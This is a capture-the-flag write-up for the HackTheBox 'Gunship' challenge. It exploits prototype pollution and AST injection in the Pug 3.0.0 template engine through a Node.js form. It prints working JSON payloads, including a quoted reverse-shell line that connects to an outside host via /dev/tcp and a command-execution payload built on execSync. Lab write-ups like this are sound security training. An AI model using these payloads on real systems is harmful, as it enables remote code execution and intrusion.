2.5 KiB
HackTheBox-Gunship
We are giving an archive file to download which is password protected with hackthebox
On extracting the archive we can some files , also let's look at the web page
At the bottom we can see an input field
If we try to enter a random name it will tell us to enter the existing name of an artist
We can see two artists names in Gunship's timeline
And these are valid
If we look at the source code of index.js we can clearly see which names it accepts
But there's something else to note as well as this node js application is using pug module and we look at the version it's 3.0.0 which we can search on google for vulnerabilites which is vulnerable to prototype pollution
https://blog.p6.is/AST-Injection/#Pug
Now we cannot use the Poc which is used in the above link as we require to make a POST request and in this case we can't make any requests through ourselves as the express js would send 404 status code and won't deal with any request
So we could use burp suite to intercept the request and our exploit along with the data that is being submitted
{
"__proto__.block": {
"type": "Text",
"line": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/p6.is/3333 0>&1'`)"
}
}
We may need to edit this as we can't get a reverse shell as we are given a public IP so we could just only try to execute commands
{
"artist.name": "Westaway",
"__proto__.block":
{
"type": "Text",
"line": "test;process.mainModule.require('child_process').execSync(`id`)",
"val": "THIS IS THE VALUE"
}
}
Here we cannot see the command that we want to execute so we need to use return keyword that would return the output of the command
It's returning in buffer format so we need to change the encoding and we can do that by adding {encoding:'utf-8'}
For the flag as the flag file name is a randomly generated name
